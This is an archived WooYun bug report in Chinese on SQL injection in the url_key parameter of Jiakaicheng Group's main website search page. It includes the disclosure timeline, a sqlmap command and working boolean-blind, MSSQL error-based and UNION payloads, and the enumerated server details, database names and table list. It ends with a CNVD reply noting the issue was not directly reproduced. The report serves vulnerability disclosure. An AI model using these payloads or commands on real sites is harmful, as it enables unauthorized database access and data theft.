当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0167637

漏洞标题:中国500强之嘉凯城集团股份有限公司主站SQL注入一枚

相关厂商:嘉凯城集团股份有限公司

漏洞作者: 逆流冰河

提交时间:2016-01-06 15:45

修复时间:2016-02-22 16:48

公开时间:2016-02-22 16:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-06: 细节已通知厂商并且等待厂商处理中
2016-01-08: 厂商已经确认,细节仅向厂商公开
2016-01-18: 细节向核心白帽子及相关领域专家公开
2016-01-28: 细节向普通白帽子公开
2016-02-07: 细节向实习白帽子公开
2016-02-22: 细节向公众公开

简要描述:

嘉凯城集团股份有限公司

详细说明:

1,URL:sqlmap -u "http://**.**.**.**/search_list.aspx?url_key=%" --batch
2,注入信息:
Parameter: url_key (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: url_key=%%' AND 7915=7915 AND '%'='
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: url_key=%%' AND 2150=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(113)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (2150=2150) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(107)+CHAR(106)+CHAR(113))) AND '%'='
Type: UNION query
Title: Generic UNION query (NULL) - 17 columns
Payload: url_key=%%' UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(118)+CHAR(113)+CHAR(98)+CHAR(113)+CHAR(112)+CHAR(78)+CHAR(108)+CHAR(105)+CHAR(118)+CHAR(65)+CHAR(89)+CHAR(121)+CHAR(118)+CHAR(79)+CHAR(113)+CHAR(120)+CHAR(107)+CHAR(106)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
---
3,库信息
web server operating system: Windows 8 or 2012
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 8.0
back-end DBMS: Microsoft SQL Server 2008
available databases [8]:
[*] building
[*] calxon_group
[*] master
[*] model
[*] msdb
[*] mty
[*] tempdb
[*] zhongkai
4,表
Database: calxon_group
[36 tables]
+----------------------------+
| D99_Tmp |
| sqlmapoutput |
| tb_about_info_3 |
| tb_about_info_51 |
| tb_about_info_51 |
| tb_about_info_7 |
| tb_case_bulletin_info |
| tb_case_info |
| tb_case_investor_info |
| tb_company_info |
| tb_cooperate_info |
| tb_department |
| tb_emp_info |
| tb_gongmin_dtl |
| tb_gongmin_mst |
| tb_group |
| tb_investor_bulletin_info |
| tb_investor_capital_info |
| tb_investor_info |
| tb_investor_personnel_info |
| tb_job_info |
| tb_memorabilia_info |
| tb_menu_right_group |
| tb_menu_right_group |
| tb_menu_right_person |
| tb_news_dtl_type |
| tb_news_emp_info |
| tb_news_info |
| tb_para_dict_dtl |
| tb_para_dict_mst |
| tb_project_info |
| tb_project_picture_info |
| tb_service_project_info |
| tb_system_menu |
| tb_zazhi_dtl |
| tb_zazhi_mst |
+----------------------------+
好了,不继续了

漏洞证明:

Fix

修复方案:

Fix

版权声明:转载请注明来源 逆流冰河@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2016-01-08 17:48

厂商回复:

CNVD未直接复现所述情况,暂未建立与网站管理单位的直接处置渠道,待认领。

最新状态:

暂无